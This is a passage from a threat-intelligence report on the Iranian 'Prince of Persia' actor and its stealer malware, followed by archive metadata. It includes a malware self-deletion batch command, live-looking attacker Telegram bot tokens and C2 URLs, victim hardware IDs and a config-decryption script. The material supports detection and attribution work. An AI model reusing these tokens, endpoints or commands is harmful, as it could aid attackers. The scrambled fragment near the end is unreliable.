stub:\r\n5BF4902802BCC524679C47555F85E230B55829CAEF5CD3777250F952A0F4C967\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 27 of 43\n\nLastly, both drop a .bat file for self destruction:\r\nchcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah \r\nchcp 65001TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah\r\nBoth are identical, except the current process ID and ZZ Stealer deletes a single file:\r\nWe also found an older stub of StormKitty configured with the same Telegram group ID uploaded to VirusTotal.com in\r\nOctober 2024 and created on May 14, 2024, which is exactly the date of the first message sent in the threat group chat. \r\nSha256: 4398063cd50c77b8d28f15c35b5948165b356f33dd7c4504eeac0c328fe97487\r\nWhen it executed in the VirusTotal.com sandbox back in 2024, it resulted in a file 0BF9CBC365.zip\r\nae2005c3fe8ab3b96ab712c5543651431c25fa4f42f828e22bf3ae414cf663c1:\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 28 of 43\n\nOn January 17, 2026, we began capturing exfiltrated files from a new malware in the Telegram group\r\n7033932802:AAGEIhL9e0lyUi0vjZnRy3PcwnKJPhSCFWQ:\r\nThe threat actor was rebranding the malware as Phantom Stealer v3.5.0.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 29 of 43\n\nA website was referenced where the malware and crypter can be purchased.\r\nThe website also includes a 14-minute video about how to set up the malware, including the IP of the attackers RDP server\r\n191.101.130.244 and Telegram messages.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 30 of 43\n\nThis IP is resolved to the same phantomsoftwares.site from February to March 2025 and is used as a host to download\r\ndifferent malware files:\r\nPhantom Stealer shares a lot of source code with StormKitty malware. The configuration is encrypted using the same AES\r\nencryption with this key and IV:\r\nIt also uses the same encryptor as Stealerium’s encryptor:\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 31 of 43\n\nPhantom Stealer was analyzed before in this Proofpoint article.\r\nThe mic2.txt file was downloaded by a VBScript from 191.101.130.244. The VBS decodes it from base64 encoding and\r\nexecutes it.\r\nThis mic2.txt is also downloaded by Remcos malware, which was found by Symantec and shown in this article to be used by\r\nAPT33.\r\nAPT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted\r\norganizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the\r\naviation and energy sectors.\r\nRemcos is not a self-developed tool and is widely used by different threat groups, but it may indicate one possible link\r\nbetween Prince of Persia and APT33 and serves as a second link to different Iranian threat groups.\r\nTrack Back to 2022\r\nThe older version of ZZ Stealer connected to C2 server http://128.199.113.162/awautng.php and downloaded and executed\r\nStormKitty.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 32 of 43\n\nThe request to http://128.199.113.162/stwittc/upwawsfrg.php is used to upload the captured screenshot.\r\nStormKitty connects to the same Telegram chat group ID 1126217452 commanded by the same operator N3cro M4ncer, but\r\nwith a different bot named quakerz_bot. The API key is: bot5444063802:AAFQNx_Hpow_i63EVEkfhenefbLEXQSAzbY\r\nWe were able to capture more than 1000 messages, including 60 non-encrypted files since 2021. The other files were sent to\r\nhttps://anonfiles.com, which was a third-party site that has not been available since July 2022.\r\nThe password of the encrypted zip files are sent via Telegram\r\nIn August 2022, just after the first test message, it was rebranded as Monkey Report.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 33 of 43\n\nThe Monkey variant is very similar to the 8==3 variant, with the main difference being that it is not protected by a Confuser\r\nobfuscator and the Telegram group and C2 are for the older version. Here is the source code that generates it decompiled\r\nfrom (29529eb346f6dad7815e604af1af3931d3c9c42db7ec0a1d90484713ce7089d7):\r\nSome of the messages were sent multiple times. We mapped 46 different victims from the US, UK, Germany, Nigeria, and\r\nmore. The table below maps the victims based on their external IP addresses, with some victims having more than a single\r\nIP. See Appendix B for a list of the victim Hardware IDs. \r\nCountry  # of Victims by IP\r\nUnited States 22\r\nRussia 21\r\nGermany 18\r\nNigeria 5\r\nThe Netherlands 5\r\nSwitzerland 4\r\nCanada 3\r\nSingapore 3\r\nUnited Kingdom 3\r\nAustria 2\r\nIndia 2\r\nSouth Korea 2\r\nVietnam 2\r\nColombia 1\r\nCzechia 1\r\nFrance 1\r\nGhana 1\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 34 of 43\n\nIndonesia 1\r\nItaly 1\r\nJordan 1\r\nKosovo 1\r\nSenegal 1\r\nOn January 23, 2024, we received a message from a new builder named “Phemedrone Builder,” which is another C#\r\ninfostealer similar to StormKitty. As seen in the analysis in this Splunk article, it commonly used 191.101.130.244 in 2024.\r\nOn February 18, 2024, the “Monkey report” was changed to our known “8==3 report”, meaning it was probably this first\r\nreport exfiltrated by this StormKitty “8==3” malware version.\r\nIn March 2024, the chat group was spammed by the developer of a crypter, who tried to convince the threat actor to\r\npurchase it. The same message was sent thousands of times. \r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 35 of 43\n\nThis probably caused the threat actor to move to the new bot and the new API key in May 2024.\r\nStormKitty Correlation with Other Public Infostealers\r\nA report by Uptycs from 2023 details another StormKitty stub named HookSpoofer RAT, which connects to a different\r\nTelegram group but uses the exact same decryption key and salt. The code is also the same and two DLLs are downloaded in\r\nruntime from the StormKitty Github. The Telegram API is:\r\nhttps://api.telegram.org/bot6122846074:AAF6rJZMCIphpMPrSWQdU2PZSf14u6p4zeA/getchat?chat_id=-1001870471979\r\nAccording to the research above: “Misuse of open source stealers has become common, with StormKitty code being\r\nobserved earlier in Typhon, WorldWind stealer, and Prynt Stealer malware.”\r\nAnother research report from Zscaler correlated DarkEye and AsyncRAT to the StormKitty code. We found out the DarkEye\r\nemoji is the same emoji used by the Prince of Persia threat actor as well. We even found research from 2020 with a very\r\nsimilar malware named Stealrium, which uses Discord instead of Telegram. There is also a possible connection to the Snake\r\nKeylogger, which exfiltrates the files in a similar way.\r\nThe text is identical except “PW” instead of “Log” and the extension is .html.exe instead of .zip.\r\nhttps://x.com/g0njxa/status/1825836948092596572To conclude, the usage of StormKitty and other popular infostealer\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 36 of 43\n\nvariants is widespread and has weak correlation to Prince of Persia. According to this Bitsight article, infostealer attribution\r\nfor Worldwind comes in third place and Prynt is in the top 10: \r\nSource: Bitsite Research Titled “Exfiltration over Telegram Bots: Skidding Infostealer Logs”\r\nBut the most interesting correlation was found when we dug deeper into the ZIP/lnk infection instead of the final stub\r\nmalware. We found a possible link to “Educated Manticore,” an Iranian threat group targeting Iraq and Israel documented in\r\nthis Check Point article.\r\nThe lnk file 0f4d309f0145324a6867108bb04a8d5d292e7939223d6d63f44e21a1ce45ce4e mentioned in this report with the\r\npowershell script that decode the executable is almost identical to our lnk file, except that 0x77 is used as the xor key instead\r\nof 0x33/0x44. It also was extracted from a ZIP file that is similar to our malicious zip file, but the finalAgent.exe is different\r\nfrom our ZZ Stealer.\r\nConclusion\r\nOur ongoing research campaign into the prolific and elusive group known as Prince of Persia has highlighted critical details\r\nabout their activities from December 18, 2025—when Part I of our research was published—to January 8, 2026, when the\r\nIranian government imposed a country-wide internet blackout and the group was temporarily inactive. We detected renewed\r\nactivity on January 26 as they began preparing new C2 servers. This led us to predict that the Iranian regime would soon end\r\nthe internet blackout, which correctly came to fruition one day later on January 27. We believe this provides solid proof that\r\nthe Prince of Persia is a state-sponsored threat actor operated by the Iranian regime and that we have the ability to predict its\r\nfuture actions using the visibility we have established into their cyber operations.\r\nBy sharing our research publicly, we hope to help other cybersecurity professionals better understand the associated risks\r\nand IOCs of this group. Towards this end, we recommend that organizations take the following steps to protect themselves\r\nagainst the techniques used by the Prince of Persia:\r\nEnsure their security controls are updated to protect against the IoCs provided in Appendix B\r\nMonitor for any unusual Telegram traffic\r\nEnsure their operating systems are fully updated\r\nFor more in-depth information about this research, please: \r\nContact your customer success representative if you are a current SafeBreach customer\r\nSchedule a one-on-one discussion with a SafeBreach expert\r\nContact Kesselring PR for media inquiries \r\nAbout the Researcher\r\nTomer Bar brings over 20 years of cybersecurity research experience to this position, including work in the areas of\r\nadvanced persistent threat (APT) groups, vulnerabilities, reverse engineering, and forensics. As a hands-on security\r\nresearcher and head of the SafeBreach Labs team, Bar has discovered multiple vulnerabilities in the Windows operating\r\nsystem, His contributions have earned him recognition as one of Microsoft’s 2023 Most Valuable Security Researchers and a\r\nnomination for Best Privilege Escalation Vulnerability at the 2021 Pwnie Awards. Tomer holds a Master’s degree from Bar\r\nIlan University, He is a frequent public speaker, presenting his research at events worldwide, including DEF CON (28-31),\r\nBlack Hat USA, Black Hat Asia, etc. he is also member of BlackHat Europe review board where he leads the malware track\r\ntalks.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 37 of 43\n\nAppendix A: ZZ Stealer Decryption Script\r\nimport base64\r\nimport argparse\r\nfrom Crypto.Cipher import AES\r\nfrom Crypto.Protocol.KDF import PBKDF2\r\nfrom Crypto.Hash import SHA1\r\ndef getKey(password,salt):\r\n    key = PBKDF2(password,salt,dkLen=32,count=1000,hmac_hash_module=SHA1)\r\n    return key    \r\ndef decrypt_string(encrypted_base64: str,password: str,salt: str,iv: str) -\u003e str:\r\n    encrypted = base64.b64decode(encrypted_base64)\r\n    key = getKey(password,salt)\r\n    cipher = AES.new(key, AES.MODE_CBC, iv)\r\n    decrypted = cipher.decrypt(encrypted)\r\n    return decrypted.rstrip(b”\\x00″).decode(“utf-8”)\r\ndef main():\r\n    password = b”Q3eLgimpA”\r\n    salt = b”dftfun%^a”\r\n    iv = b”$5fysp84AzCpnUZA”\r\n    parser = argparse.ArgumentParser(description=”decrypt Base64 encrypted input from command line or file”)\r\n    group = parser.add_mutually_exclusive_group(required=True)\r\n    group.add_argument(“–single_b64″,help=”Single Base64 encrypted string”)\r\n    group.add_argument(“–file_of_b64″,help=”File containing Base64 encrypted strings”)\r\n    args = parser.parse_args()\r\n    if args.single_b64:\r\n        b64_values = [args.single_b64]\r\n    elif args.file_of_b64:    \r\n        with open(args.file_of_b64,’r’) as f:\r\n            b64_values = f.readlines()\r\n    for b64_value in b64_values:\r\n        encrypted_base64 = b64_value.strip()\r\n        print(“%s,%s”%(decrypt_string(encrypted_base64,password,salt,iv),encrypted_base64))        \r\nif __name__==”__main__”:\r\n    main()\r\nAppendix B: IOCs – Malware Hashes\r\nTornado v51 Winrar Exploit rar file\r\n44fc9e306763774b50b61fc7487aa1d219aa288aefa201119c7bc278e17600a8\r\nTornado v51 SFX file\r\n5db4ed7d07ab028ab6ceba8efec5f667d86a419020d2a8c86e90a3125aa31bb9\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 38 of 43\n\nTornado v51 main dll- file name: AuthFWSnapin.dll\r\n8DB20544F280955ED3EF3C42DC8423E3000E244FC7C8F0E3A7567FA48F7A15D9 \r\nTornado installer dll: reg7989.dll , sha256\r\nB937024B7484B26D09BA8130CC4AB04600DC18C976BB0C7724A063F1FC6F0D77\r\nTornado = Foudre v51 C2 Servers\r\nActive C2 Server: 45.80.148.249\r\nActive Dates: Since December 24, 2025, for Foudre\r\nDomain names:\r\nszzqwggurg.hbmc.net\r\nszzqwggurg.conningstone.net\r\nkbbpissmqs.conningstone.net\r\nkbbpissmqs.hbmc.net\r\nvssmqppaup.conningstone.net\r\nvssmqppaup.hbmc.net\r\nskttxrdwucbw.hbmc.net\r\nskttxrdwucbw.conningstone.net\r\nvtykvjbmhkpah.hbmc.net\r\nuiavuflyjqodj.hbmc.net\r\nuiavuflyjqodj.conningstone.net\r\nNon active C2 Server: 45.80.148.195Active Dates: between October 12, 2025, for TornadoFoudre\r\nTornado Telegram Chat\r\nhttps://api.telegram.org/bot7900216285:AAEVjLjt4csUKGanerJuuiDhdsmlUv0yooM/getChatMember?\r\nuser_id=874675833\u0026chat_id=874675833Tornado Public Key\r\nTgpMb2NrQm94MwEAAAADAAEAAFeitSHwMCpWaei85UCzNfaaxbdwLSOSKmd1iTYoYjkRWSokNDcBwld0uuzfr6MpeIpMH/X7ZbzMwjYi8X5\r\nTonnerre v14 exe\r\nCB6ED0DD5DBC2E34AE36DD22B9522F7EEC94BBFDA2DCDA7425736656279F8CDF\r\nTonnerre v15 exe\r\n30C20ADA243B7E476E006DEC94876BDEECE4F8ACA12A4CB6CF962C80F1A6EE3C\r\nTonnerre v17 exe\r\nD9DFC8A8E3E259A517A91E2E91E3A1D6EF1D5B0886E6729BF897D6EF1B2DE722\r\nFoudre SFX v34  \r\n43ccc2620229d88d5a6ca2b064da0554ec3c3cc29a097e7a2d97283257cfae69\r\n0bfc11c6ba57fdaa8b865555d80d8f7d7b1d0f41a23a277885198b3113c945d9\r\nCf64bf78ce570f8085110defc8ec32ff4f01c7359723510b9d1923fd93d12240\r\nFBB2AC0D07B84068AA35376CC994039F9FC1D2341643BC2BF268D65AB11ECBE3\r\n2c46406fb9111e0e4d982de54f335ae2900cdc39490d58f765cd5014153b3e12\r\nFoudre v34 dll – imphash \r\n57447c4c35a807b252b9ba3c17de230f\r\nd912\r\n52abb57bf6f9db815b3ddf6241e21d4096f36eb998bb51e728bbe68c0f8e8e15\r\nd232\r\nfa95a09e538b8c186a3239e3ff80ec9054b50aab80c624e75563ace4e60e31da\r\nd463\r\nF54cfe296186644d0fed271c469af1ef9b6156affe9e030e7b83b8de097eb1e7\r\nD665\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 39 of 43\n\n6f976a685ae838a7062fb4f152c6c77c42168b78b9aadd4278ec1c19f9bc1055\r\nD955\r\n12847DC6DFD86603E8F0085AE561B4B2E3089E5414E49628F7C411483C7B5CE8\r\nFoudre v34 Loaders \r\nconf8830.dll\r\nd3d8b79f86f152338aabeadfaf35ba2e43f82aa4bfa29ff70b59702b455fa6a6\r\nFoudre Office Infection \r\n15dd41ec1bdaabb741e8cc6481e0a98831798ac4e93c2513cdbd00c51241ffb7\r\n52e3a856548825ec0a3d6630e881ff4f79d2a11bc3420a73d42e161fabed53d9\r\nTonnerre v17 SFX\r\nC8583FDDF668808E31F993FF6BCFC6F8BA8B4C2C0C4EA51D4CCC6F5D311B6C90\r\nMaxPinner v5 \r\nTel jam shid.exe – upload to 13/6/21 to VirusTotal – creation probably 16/8/18\r\n34692cabe9e9ba584ec2b8947a7aad4f787d10a3da56886e52d05d0675fe7b01\r\nFixed FTP server – ttdl3.dynu.net was probably resolved to 178.33.49.126\r\nMaxPinner v8  \r\n5AD83F9FAD87273593F9DF73761DE211A704E6E10984FDE113A6435CC83C1E58\r\nSFX – 04844b5e15750467224c29b6fe5806e4093cd1d0ee4904dccf96831947574c85\r\nAmaq Finder\r\nB9741ad9ac084fb43804618acabe637f6b097bf72264b3335514678b2d0da785 – Amaq Finder Version 1.0 – 2017-07-19\r\nA107635083212c662dbb3b69951e0de7b3d3894d8bcd7cfff545d119f81aeb1f – AmaqFinder1.rar\r\nAmaq Finder v1.7\r\n23761caf7f4c6d7b3b4608c59729eb807c961deaa23aac94db5289b9b9739864\r\n09a2f03b5d54b48ba5f0df9ea57a6c20ba6fa90ad0f334132ea1da9320fbfbfd\r\na8565b678857129158904760ffe468e3ea6e4cf8a63a6c16b97e5717b1e8a384\r\namfkey01.key\r\nDE94830B9B4DF6867B7D2888ACCA9F3D0C103933B01721C04E6BD6492BDE9E58\r\nDeep Freeze Version\r\n55d60bcf83c81fff25ca413dc2f720a671f522d79cc13b6d618f7f25094acd62\r\nB1a16dd0500c570fb44cd13b68737fcd18710072559f810f3b3691ca93787cff\r\n39cdff475bb6d03e56d047b0d00b352c2c61b4d3a3c7b7b06262bf84e481dee9\r\nFoudre v34 checks Internet connectivity and gets current date:\r\nhttp://worldtimeapi.org/api/timezone/GMT\r\nAmaq Finder checks Internet connectivity and gets current date: http://www.cnbc.com/id/100727362/device/rss\r\nTornado checks the same using:\r\nhttps://timeapi.io/api/time/current/zone?timeZone=UTC\r\nZIP files extracting powershell that decodes ZZ Stealer executable\r\nEnrich-ASUS-2025-10-13 08-30.zip\r\nC1896C20E1E397F8C59DBEAEF37CC765D401C8F6D933B140BE774F0FBF118EF4\r\nVladimir-WIN11-2025-10-29 08-44.zip\r\n8abfe36182573e1ba1e6e0d227d60d83002191b7e30a88064c073814b0baf318\r\nOlder versions than 3.81\r\nOng.zip\r\n2312e7f362650f642a1c6319817219ca85100bdbfa07d4c0a54212e507d4970b\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 40 of 43\n\nJoris-ASUS1337.zip\r\nda6dd7f8cf4460ca1364ab18a74160ad49a28e412c05a41fbffbf6c93452dcd7\r\nZZ Stealer Executable\r\nVersion 3.81 – netguid:3d71ab44-80ca-4748-8d45-5ad49d1cb242\r\nF9B963235B954C521096256A10D8E8DCE0092C9CA054E78DCE3CAC63756D0976\r\nD33A70E5066BBE06C8E12C45612359D452CBCAF009221AB5CC4F5B9ADD6B2CCB\r\n600C0C0BF6233C99F75B0427075E8AB9ACF23F4F7970C09FA4C2580EF6EB2C67\r\n83441B424807CD432F87770723289271DD9592848D863D349E3FBEED8F367370\r\nAB48FF49A9D33896BDE49117162049EEF3617CE4B85378D33F1D08BA06DF77E7\r\nVersion 3.82 – netguid:71f70dc5-37d1-4ddb-acb0-a942aa2ad623\r\nACD7308C4C250B0740418A2175CA804EF8E26A7E5C96474A3F84320D31ABE45C\r\nA6EB64BF9C52FED2EB043E94BC9FA69A1EA836DAE82EA1E87E55A9E4828F1E38\r\nZZ Stealer AB version\r\n4cf48c2a3933ac4c6733533bf16d40fa4e411fbbf42b03d84d6c8df62e253ad0\r\n8897994e897bb1b2d22188d332ea972eff725b3b02b9dab0e5b5e73ab60d79c4\r\n7f2177c2eeafb491342814820f37cee8f3eab6e8c9566d7b6131d228616ca189\r\n410033e46e926202a4c152237609f866d7278d66bae965af17c0c0792228a993\r\nAB Metasploit payload and C2\r\n4EDF2A61C1A4AF58990FE72A746D9B810CD173DDB40BAF56231A580095B6C252\r\n7e0b5396f1f00177e19b7887137dcc314dccee09f5855c1b6a60129c65310a24\r\n9236d5d27fdf34bc757a0aae3b4d3e1446282b8f38d9ff700702fad16c8e7ec9\r\n104.248.194.233:443\r\nStormKitty (8==3 version)\r\n4398063cd50c77b8d28f15c35b5948165b356f33dd7c4504eeac0c328fe97487\r\nF1cdf63ba69eeed3ddc0a353af01843a91dd80dd0fba07940604062da0fed511\r\nStormKitty (Monkey version, no ConfuserEx)\r\n29529eb346f6dad7815e604af1af3931d3c9c42db7ec0a1d90484713ce7089d7\r\nStormyKitty C2 and Telegram group\r\nhttps://api.telegram.org/bot7033932802:AAGEIhL9e0lyUi0vjZnRy3PcwnKJPhSCFWQ/getchat?chat_id=1126217452\r\nolder versions than 3.81\r\nhttp://128.199.113.162/XtfcshEgt/upwawsfrg.php\r\nhttp://128.199.113.162/stwittc/upwawsfrg.php\r\nhttp://128.199.113.162/awautng.php\r\nhttp://128.199.113.162/zawautng.php\r\nCurrent live C2\r\nhttp://209.38.92.52/RdstgcDe/upwawsfrg.php\r\nHWID’s of victims\r\n00064BF079\r\n049F8BD852\r\n078BFBFF00000F61\r\n078BFBFF00010673\r\n078BFBFF000106A3\r\n078BFBFF000106A5\r\n078BFBFF000206A1\r\n078BFBFF000306C1\r\n078BFBFF000306D2\r\n078BFBFF000506E3\r\n078BFBFF00A00F11\r\n0F8BFBFF000206D7\r\n0F8BFBFF000306A9\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 41 of 43\n\n0F8BFBFF000306E4\r\n0F8BFBFF000306F2\r\n0F8BFBFF000406F1\r\n0F8BFBFF00050657\r\n0F8BFBFF000606A6\r\n0F8BFBFF000906EA\r\n178BFBFF000006FB\r\n1F8BFBFF000206D7\r\n1F8BFBFF000306A0\r\n1F8BFBFF000306F2\r\n1F8BFBFF00050657\r\n297CD3ED97\r\n40086765B6\r\n8C77F2E9E5\r\nA69DAB2B64\r\nAACFDD6972\r\nACCFDFF6CB\r\nBECF19200906ED\r\nBFEBFBFF000106CA\r\nBFEBFBFF00020655\r\nBFEBFBFF000206A7\r\nBFEBFBFF000306C3\r\nBFEBFBFF00040651\r\nBFEBFBFF000406E3\r\nBFEBFBFF000806E9\r\nBFEBFBFF000806EA\r\nBFEBFBFF000906E9\r\nBFEBFBFF000906EC\r\nBFEBFBFF000906ED\r\nE55F9AF947\r\nF1E1BA261F\r\nFE78CBC92C\r\nUnknown\r\nPossible APT33 related\r\nVBS\r\n2c202cd79bfd44e8f474d58df02d4882b5c45c2c06fba1adb5e488d41ca47f04\r\nRemcos\r\n75900c975601b657f881164daddb4bc8e8b723883c2b7a4ac0ff91f25a8397ad\r\nPhantom Stealer source code zip (builder and stub)\r\n090b78e9d935867ad357f5a6a028b88ff16847271d88aeb63ba22c65a947b0ac\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 42 of 43\n\nSource: https://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 43 of 43\n\nnow the same file Also on December was used to encrypt each 28, the older C2 server file. for Tonnerre versions 12-16 (http://92c5d3b3.ddns.net) stopped resolving to\n45.80.148.35. Later that day, the threat actor replaced the C2 server 45.80.148.35 with a new C2 server for both Foudre and\nTonnerre. The domain names lklptttt.space and onnmuoru.privatedns.org started resolving to a new C2 server 45.80.149.3.\n Page 4 of 43 \n\n https://www.safebreach.com/blog/prince-of-persia-part-ii/ \nBelow is the relevant function in the source code of ZZ Stealer that reproduced it. The only single difference is that in ZZ\nStealer, the first line is “ 8==3-Report*” instead of “ StormKitty- Report*”. 8==3 is a common ASCII-style\n Page 26 of 43", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.safebreach.com/blog/prince-of-persia-part-ii/" ], "report_names": [ "prince-of-persia-part-ii" ], "threat_actors": [ { "id": "a63c994f-d7d6-4850-a881-730635798b90", "created_at": "2025-08-07T02:03:24.788883Z", "updated_at": "2026-04-10T02:00:03.785146Z", "deleted_at": null, "main_name": "COBALT TRINITY", "aliases": [ "APT33 ", "Elfin ", "HOLMIUM ", "MAGNALIUM ", "Peach Sandstorm ", "Refined Kitten ", "TA451 " ], "source_name": "Secureworks:COBALT TRINITY", "tools": [ "AutoCore", "Cadlotcorg", "Dello RAT", "FalseFont", "Imminent Monitor", "KDALogger", "Koadic", "NanoCore", "NetWire", "POWERTON", "PoshC2", "Poylog", "PupyRAT", "Schoolbag" ], "source_id": "Secureworks", "reports": null }, { "id": "f763fd1f-f697-40eb-a082-df6fd3d13cb1", "created_at": "2023-01-06T13:46:38.561288Z", "updated_at": "2026-04-10T02:00:03.024326Z", "deleted_at": null, "main_name": "Infy", "aliases": [ "Operation Mermaid", "Prince of Persia", "Foudre" ], "source_name": "MISPGALAXY:Infy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e5ff825b-0456-4013-b90a-971b93def74a", "created_at": "2022-10-25T15:50:23.824058Z", "updated_at": "2026-04-10T02:00:05.377261Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "APT33", "HOLMIUM", "Elfin", "Peach Sandstorm" ], "source_name": "MITRE:APT33", "tools": [ "PowerSploit", "AutoIt backdoor", "PoshC2", "Mimikatz", "NanoCore", "DEADWOOD", "StoneDrill", "POWERTON", "LaZagne", "TURNEDUP", "NETWIRE", "Pupy", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f", "created_at": "2023-01-06T13:46:38.367369Z", "updated_at": "2026-04-10T02:00:02.945356Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "Elfin", "MAGNALLIUM", "HOLMIUM", "COBALT TRINITY", "G0064", "ATK35", "Peach Sandstorm", "TA451", "APT 33", "Refined Kitten" ], "source_name": "MISPGALAXY:APT33", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "1efe328c-7bda-49d8-82bf-852d220110ae", "created_at": "2026-01-22T02:00:03.661882Z", "updated_at": "2026-04-10T02:00:03.917703Z", "deleted_at": null, "main_name": "Educated Manticore", "aliases": [], "source_name": "MISPGALAXY:Educated Manticore", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "59c9f31b-e032-44b9-bf3b-4f2cb3d17e39", "created_at": "2022-10-25T16:07:23.734244Z", "updated_at": "2026-04-10T02:00:04.731031Z", "deleted_at": null, "main_name": "Infy", "aliases": [ "APT-C-07", "Infy", "Operation Mermaid", "Prince of Persia" ], "source_name": "ETDA:Infy", "tools": [ "Foudre", "Infy", "Tonnerre" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439139, "ts_updated_at": 1775792182, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0320483934aa386688f962f27c809fb89ac15f87.pdf", "text": "https://archive.orkl.eu/0320483934aa386688f962f27c809fb89ac15f87.txt", "img": "https://archive.orkl.eu/0320483934aa386688f962f27c809fb89ac15f87.jpg" } }